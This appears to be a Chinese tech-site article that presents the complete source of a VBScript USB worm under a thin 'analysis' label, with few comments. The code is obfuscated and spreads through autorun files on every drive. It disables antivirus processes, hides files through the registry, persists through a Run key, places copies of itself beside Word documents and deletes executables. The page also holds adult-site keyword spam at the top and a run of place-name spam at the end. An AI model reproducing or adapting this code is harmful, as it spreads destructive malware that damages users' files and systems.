中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

vbs病毒源文件的示例分析

發布時間:2021-10-13 15:04:46 來源:億速云 閱讀:147 作者:小新 欄目:開發技術

這篇文章主要介紹了vbs病毒源文件的示例分析,具有一定借鑒價值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

僅供參考學習用:

rem vbs.rhl 
Dim fs,r,ss,w,reg,regpath,dvbs 
ddd="Set fs =" &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "Scrip" & chr(116) & "ing.File" & chr(83) & "yste" &chr(109) & chr(79) & "bject" & chr(34) & chr(41) 
Execute ddd 
rrr="set r =" &chr(119) & "scri" & "pt." &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & chr(119) & "scri" & "pt." &chr(115) & "he" & chr(108) & chr(108) & chr(34) & chr(41) 
Execute rrr 
sss="fs." & chr(103) &"etfil" & chr(101) & chr(40) &chr(119) & "scri" & "pt." & "scri" & chr(112) & "tfull" &chr(110) & "ame" & chr(41) 
ttt="set dvbs =" & sss 
Execute ttt 
r.run (fs.GetSpecialFolder(0)&"\explorer.exe .\") 
main()  
On Error Resume Next 
sub main() 
regtime() 
finddrive() 
countdrive(ss) 
regwrite() 
ganranfile(ss) 
xunhuan() 
end sub    
Function finddrive()  
if dvbs.name="USBDRIVE.dll" then 
regwrite() 
ganrandisk() 
end if 
if dvbs.name<>"autorun.vbs" and dvbs.name<>"USBDRIVE.dll" then 
regwrite() 
dvbs.delete(true) 
end if 
ss=Trim("") 
Set dc = fs.Drives 
For Each d In dc 
If d.DriveType = 1 or d.DriveType= 2 and d.IsReady Then  
ss = ss & d.DriveLetter  
end if 
Next 
ss = StrReverse(LCase(Trim(ss)))  
end Function 
Function countdrive(ss) 
On Error Resume Next 
dim x 
For i = 1 To Len(ss)  
x = Mid(ss, i, 1)  
if x="" then 
x=Mid(ss, 1, 1) 
i=1 
end if 
Set w = fs.GetDrive(x) 
ganrandiskroot() 
Next 
end Function 
Function ganrandiskroot() 
dim c,s,f,vbc,ts,runreg 
On Error Resume Next 
If w.DriveType=2 or w.DriveType=1 and w.IsReady Then 
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then 
else 
fff=sss & ".copy(" & chr(34) & fs.GetSpecialFolder(1) & "\USBDRIVE.dll" &chr(34) & ")" 
Execute fff 
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then 
else 
fff=sss & ".copy(" & chr(34) & "D:\System Volume Information\USBDRIVE.dll" &chr(34) & ")" 
Execute fff 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg") 
f.attributes=f.attributes+7 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg") 
f.attributes=f.attributes+7 
end if 
end if 
end if 
If fs.FileExists(w.DriveLetter & ":\autorun.vbs") Then 
Set c = fs.opentextfile(w.DriveLetter & ":\autorun.vbs", 1) 
vbc = c.readall 
If InStr(vbc,"vbs.rhl") <> 0 Then 
c.Close 
Else 
c.Close 
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs") 
c.delete(true) 
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")" 
Execute fff 
s=Array("2007總結病毒","這是病毒","違紀病毒","檢查病毒","黑名單病毒","沒有發出的病毒","戀愛的病毒(病毒)") 
Randomize     
i= Int((6 * Rnd) + 1)  
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")" 
Execute fff 
Set b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs") 
b.attributes=b.attributes-b.attributes 
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs") 
c.attributes=c.attributes+7 
If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Then 
else 
if w.DriveLetter="C" then 
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg") 
f.attributes=f.attributes+7 
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg") 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg") 
f.attributes=f.attributes+7 
else 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg",true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg") 
f.attributes=f.attributes+7 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg") 
f.attributes=f.attributes+7 
end if 
end if 
end if 
else 
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")" 
Execute fff 
s=Array("檢查病毒","2007總結病毒","違紀病毒","這是病毒","黑名單","沒有發出的病毒","戀愛的病毒(病毒)") 
Randomize     
i= Int((6 * Rnd) + 1)  
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")" 
Execute fff 
Set b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs") 
b.attributes=b.attributes-b.attributes 
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs") 
c.attributes=c.attributes+7 
If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Then 
else 
if w.DriveLetter="C" then 
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg") 
f.attributes=f.attributes+7 
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg") 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg") 
f.attributes=f.attributes+7 
else 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg") 
f.attributes=f.attributes+7 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg") 
f.attributes=f.attributes+7 
end if 
end if 
end if 
If fs.FileExists(w.DriveLetter & ":\autorun.inf") Then 
Set c = fs.opentextfile(w.DriveLetter & ":\autorun.inf", 1) 
vbc = c.readall 
If InStr(vbc,"WScript.exe .\autorun.vbs") <> 0 Then 
c.Close 
Else 
Set f = fs.GetFile(w.DriveLetter & ":\autorun.inf") 
f.attributes=f.attributes-f.attributes 
Set ts = f.OpenAsTextStream(2,-2) 
ts.WriteLine "[AutoRun]"  
ts.WriteLine "open= " 
ts.WriteLine "" 
ts.WriteLine "shell\open=打開(&O) " 
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"  
ts.WriteLine "shell\open\Default=1 " 
ts.close 
f.attributes=f.attributes+7 
end if 
else 
Set ts = fs.CreateTextFile(w.DriveLetter & ":\autorun.inf",true) 
ts.WriteLine "[AutoRun]"  
ts.WriteLine "open= " 
ts.WriteLine "" 
ts.WriteLine "shell\open=打開(&O) " 
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs" 
ts.WriteLine "shell\open\Default=1" 
ts.close 
Set f = fs.GetFile(w.DriveLetter & ":\autorun.inf") 
f.attributes=f.attributes+7 
End If 
end if 
end Function 
Function regwrite() 
On Error Resume Next 
dim s 
a1="HKE" & "Y_CUR" & "RENT_US" & "ER\Soft" & "ware\Mi" & "croso" & "ft\Win" & "dows\Cur" & "rentV" & "ersion\Exp" & "lorer\Ad" & "vanced\" (a1= HKEY_CURRENT_USER\Software\Microso ft\Windows\CurrentVersion\Explorer\Advanced\ 
a2="HK"&"EY_CLAS"&"SES_RO" & "OT\DLL" & "File\"  (a2=HKEY_CLASSES_ROOT\DLLFile) 
a3="HKEY" & "_LOCA" & "L_MACH" & "INE\SOFT" & "WARE\Mi" & "cros" & "oft\Win" & "dows\Cur" & "rentVer" & "sion\poli" & "cies\Expl" & "orer\NoDr" & "iveTypeAutoRun" 
(a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun) 
a4="HKE" & "Y_CURR" & "ENT_USE" & "R\Softw" & "are\Micr" & "osoft\Wi" & "ndows\Cur" & "rentVersi" & "on\Polici" & "es\Explor" & "er\NoDriveT" & "ypeAutoRun" 
(a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun) 
a5="HK" & "EY_LO" & "CAL_MA" & "CHINE\Sof" & "tware\Mi" & "croso" & "ft\Wind" & "ows\Curre" & "ntVersi" & "on\Ru" & "n\USBDR" & "IVE.dll" 
(a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll) 
a6="R.Re" & "gWri" & chr(116) & "e"                  (a6=R.RegWrichr(116) e) 
a7="HKE" & "Y_CLAS" & "SES_ROO" & "T\VBSF" & "ile\Defau" & "ltIcon\" 
(a7=HKEY_CLASSES_ROOT\VBSFile\DefaultIcon) 
set s=fs.GetDrive(fs.GetDriveName(dvbs.path))   
scandoc(fs.GetSpecialFolder(0) & "\Installer") 
if reg="wordicon.exe" then 
if s="C:" then 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg") 
else 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\doc.reg") 
end if 
else 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg") 
else 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\doc.reg") 
end if 
end if 
ppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&regpath & ",1"&chr(34) 
Execute ppp 
else 
if s="C:" then 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg") 
else 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\vbs.reg") 
end if 
else 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg") 
else 
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\vbs.reg") 
end if 
end if 
ppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&fs.GetSpecialFolder(1) & "\shell32.dll,1"&chr(34) 
Execute ppp 
end if 
ppp=a6&Space(2)&chr(34) & a1 & "ShowSuperHidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a1 & "HideFileExt" &chr(34)& "," & "1," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a1 & "Hidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a2 & "ScriptEngine\" &chr(34)& "," & chr(34)&"VBScript" & chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a2 & "ScriptHostEncode\" &chr(34)& "," & chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}" & chr(34) 
Execute ppp 
ppp=a6&Space(1)&chr(34) & a2 & "Shell\Open\Command\" &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1) &"\Wscript.exe" &Space(1)& chr(34) &chr(34) &"%1"&chr(34) & chr(34) &Space(1)& "%*"  & chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a2 & "ShellEx\PropertySheetHandlers\WSHProps\" &chr(34)& "," & chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}" & chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a3 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp 
ppp=a6&Space(2)&chr(34) & a4 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp 
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then 
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "D:\System Volume Information" & "\USBDR" & "IVE.dll" & chr(34) 
Execute ppp 
else 
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1)&"\USBDR" & "IVE.dll" & chr(34) 
Execute ppp 
end if 
if day(date())="27" then                                                   (27號報告錯誤) 
msgbox "小樣!你的殺毐軟件該升級了,磁盤已被格式化" 
End If 
end Function 
Function scandoc(a)                                                       (定義子函數) 
On Error Resume Next                                                      (出錯不報告) 
dim files,file,subfolder,folder_ 
set folder_=fs.getfolder(a)  
set files=folder_.files  
for each file in files             (for each。。。next   對數組或集合中的每個元素重復執行一組語句) 
if file.name ="wordicon.exe" then 
reg=file.name 
regpath=file.path 
exit Function 
end if 
next                                                                 (for each 的next) 
set subfolders=folder_.subfolders                                       (set  是一個賦值語句) 
for each subfolder in subfolders  
scandoc(subfolder)  
next   
end Function                                                        (結束子程序的定義) 
Function regtime()                                   (定義一個子程序添加注冊表,結束瑞星) 
a6="R.Re" & "gWri" & chr(116) & "e"               (a6= R.RegWri chr(116)e  chr(116)是值) 
a8="HKE"&"Y_CUR" & "RENT_US" & "ER\Soft" & "ware\Micr" & "osoft\Win" & "dows Scr" &"iptingHo"&"st\Settin"&"gs\Timeou                  (a8=注冊表HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout) 
ppp=a6&Space(2)&chr(34) & a8 &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34) 
Execute ppp                                          (對指定的字符串執行正則表達式搜索) 
dim NameorPID 
kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe") 
for i=0 to 4 
KillProcess(kill(i))                                                     (結束4個瑞星程序) 
next 
end Function                                                           (結束這個子程序) 
Function ganranfile(aa)                                                   (定義一個子程序) 
On Error Resume Next                                                       (出錯不報告) 
dim x 
For i = 1 To Len(aa)          (len函數  返回字符串內字符的數目,或是存儲一變量所需的字節數) 
x = Mid(aa, i, 1)             (mid函數  從字符串中返回指定數目的字符。這里是一個個返回給X) 
if x="" then 
x=Mid(aa, 1, 1) 
i=1 
end if 
Set x = fs.GetDrive(x)  
if x.IsReady then 
scan(x) 
else 
xunhuan() 
end if 
Next 
end Function                                                    (結束本子程序,作用不明) 
Function scan(x)                                                 (定義子程序   scan(a)  ) 
On Error Resume Next                                             ( 出錯不報告 ) 
dim files,file,subfolder,folder_ 
set folder_=fs.getfolder(x)  
set files=folder_.files  
for each file in files 
s=file.path 
ext=fs.GetExtensionName(file)  
ext=lcase(ext)                                        (  lcase函數   返回字符串的小寫形式) 
if ext="doc" then  
fff=sss & ".copy("&chr(34) & mid(s,1,len(s)-3) & "vbs" &chr(34) & ")"    (fff是sss.copy加幾個字符 
懷疑這個幾個字符組成一個文件名) 
Execute fff 
end if  
next  
set subfolders=folder_.subfolders  
for each subfolder in subfolders  
scan(subfolder)  
next  
end Function 
Function ganrandisk()  
On Error Resume Next 
regwrite() 
dim doc, d, s, coun,w,h,oo 
  Set doc = fs.Drives 
for each k in doc 
if k.IsReady then 
h=h & k.DriveLetter 
end if 
next 
t1=len(Trim(h)) 
coun=doc.count 
do while coun>0 
oo=h & w 
clearinfo(oo) 
wscript.sleep 50 
Set d = fs.Drives 
if d.count>coun then 
for each k in d 
if k.IsReady then 
s=s & k.DriveLetter 
end if 
next 
coun=d.count 
t= StrReverse(LCase(Trim(s)))  
w=mid(t,1,abs(len(t)-t1)) 
countdrive(w) 
ganranfile(w) 
s=trim("") 
t1=len(t) 
end if 
if d.count<coun then 
for each k in d 
if k.IsReady then 
s=s & k.DriveLetter 
end if 
next 
coun=d.count 
t= StrReverse(LCase(Trim(s)))  
s=trim("") 
t1=len(t) 
end if 
loop 
end Function 
Function xunhuan() 
On Error Resume Next 
dim sfo 
set sfo=fs.GetDrive(fs.GetDriveName(dvbs.path))  
if dvbs.name="autorun.vbs" or dvbs.name="USBDRIVE.dll" then 
if sfo.DriveType=2 then  
ganrandisk()  
else 
wscript.quit 
end if 
else 
dvbs.delete(true) 
end if 
end Function 
Function clearinfo(oo) 
On Error Resume Next 
dim dc,z 
oo =LCase(Trim(oo)) 
For m = 1 To Len(oo)  
z = Mid(oo, m, 1)  
Set z = fs.GetDrive(z) 
findinf(z) 
v=Array(z.DriveLetter & ":\recycled",z.DriveLetter & ":\System Volume Information") 
for i= 0 to 1 
scanexe(v(i)) 
next 
next 
vir=array(fs.GetSpecialFolder(1)& "\recycled",fs.GetSpecialFolder(2),fs.GetSpecialFolder(0)&"\system") 
for i=0 to 2 
scanexe(vir(i)) 
next 
end Function  
Function scanexe(a) 
wscript.sleep 100 
On Error Resume Next 
dim files,file,folder_ 
if fs.FolderExists(a) then 
set folder_=fs.getfolder(a)  
set files=folder_.files  
for each file in files 
ext=fs.GetExtensionName(file)  
ext=lcase(ext)  
if ext="exe" then  
Set f = fs.GetFile(file) 
f.delete(true) 
end if  
next  
set subfolders=folder_.subfolders  
for each subfolder in subfolders  
scanexe(subfolder)  
next  
end if 
end Function 
Function findinf(z) 
On Error Resume Next 
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then 
else 
fff=sss & ".copy(" & chr(34) & fs.GetSpecialFolder(1) & "\USBDRIVE.dll" &chr(34) & ")" 
Execute fff 
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then 
else 
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "D:\System Volume Information" & "\USBDR" & "IVE.dll" & chr(34) 
Execute ppp 
end if 
end if 
If fs.FileExists(z.DriveLetter & ":\autorun.vbs") Then 
else 
fff=sss & ".copy(" & chr(34) & z.DriveLetter & ":\autorun.vbs" &chr(34) & ")" 
Execute fff 
Set f = fs.GetFile(z.DriveLetter & ":\autorun.vbs") 
f.attributes=f.attributes+7 
end if 
If fs.FileExists(z.DriveLetter & ":\autorun.inf") Then 
Set c = fs.opentextfile(z.DriveLetter & ":\autorun.inf", 1) 
vbc = c.readall 
If InStr(vbc,"WScript.exe .\autorun.vbs") <> 0 Then 
c.Close 
Else 
Set f = fs.GetFile(z.DriveLetter & ":\autorun.inf") 
f.attributes=f.attributes-f.attributes 
Set ts = f.OpenAsTextStream(2,-2) 
ts.WriteLine "[AutoRun]"                                    (以下建立自動播放文件)  
ts.WriteLine "open= " 
ts.WriteLine "" 
ts.WriteLine "shell\open=打開(&O) " 
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"  
ts.WriteLine "shell\open\Default=1 " 
ts.close 
f.attributes=f.attributes+7 
end if 
else 
Set ts = fs.CreateTextFile(z.DriveLetter & ":\autorun.inf",true) 
ts.WriteLine "[AutoRun]"  
ts.WriteLine "open= " 
ts.WriteLine "" 
ts.WriteLine "shell\open=打開(&O) " 
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs" 
ts.WriteLine "shell\open\Default=1" 
ts.close 
Set f = fs.GetFile(z.DriveLetter & ":\autorun.inf") 
f.attributes=f.attributes+7 
End If 
if fs.FileExists(z.DriveLetter & ":\vbs.reg") then 
else 
Set ts = fs.CreateTextFile(z.DriveLetter & ":\vbs.reg", true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34) 
ts.close 
Set f = fs.GetFile(z.DriveLetter & ":\vbs.reg") 
f.attributes=f.attributes+7 
end if 
if fs.FileExists(z.DriveLetter & ":\doc.reg") then 
else 
Set ts = fs.CreateTextFile(z.DriveLetter & ":\doc.reg",true) 
ts.WriteLine "Windows Registry Editor Version 5.00" 
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" 
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文檔"& chr(34) 
ts.close 
Set f = fs.GetFile(z.DriveLetter & ":\doc.reg") 
f.attributes=f.attributes+7 
end if 
end Function 
Function KillProcess(NameorPID) 
On Error Resume Next 
    Dim oWMI, oProcs, oProc, strSQL 
    KillProcess = False 
    strSQL = "SELECT * FROM Win32_Process" 
    If NameOrPID <> "" Then 
        If IsNumeric(NameOrPID) Then 
            strSQL = strSQL & " WHERE Handle = '" & NameorPID & "'" 
        Else 
            strSQL = strSQL & " WHERE Name = '" & NameorPID & "'" 
        End If 
    End If 
    Set oWMI = GetObject("winmgmts:\\.\root\cimv2") 
    Set oProcs = oWMI.ExecQuery(strSQL) 
    For Each oProc In oProcs 
        If IsNumeric(NameOrPID) Then 
            oProc.Terminate 
            KillProcess = True 
        Else 
            oProc.Terminate 
if day(date())="27" then 
       set killfile=fs.getfile( oProc.ExecutablePath) 
killfile.delete(true) 
        End If 
end if 
    Next 
    Set oProc = Nothing 
    Set oProcs = Nothing 
    Set oWMI = Nothing 
End Function

感謝你能夠認真閱讀完這篇文章,希望小編分享的“vbs病毒源文件的示例分析”這篇文章對大家有幫助,同時也希望大家多多支持億速云,關注億速云行業資訊頻道,更多相關知識等著你來學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

vbs
AI

临高县| 安龙县| 冕宁县| 长泰县| 堆龙德庆县| 贵阳市| 应城市| 义乌市| 行唐县| 龙州县| 西乌珠穆沁旗| 普陀区| 清水河县| 富源县| 瓦房店市| 肥城市| 科尔| 绵阳市| 同德县| 额尔古纳市| 东明县| 红原县| 武安市| 将乐县| 忻城县| 洞口县| 舞钢市| 浦东新区| 龙南县| 休宁县| 同江市| 海盐县| 育儿| 彭山县| 奉贤区| 平利县| 达日县| 蓬莱市| 永寿县| 正阳县| 拜泉县|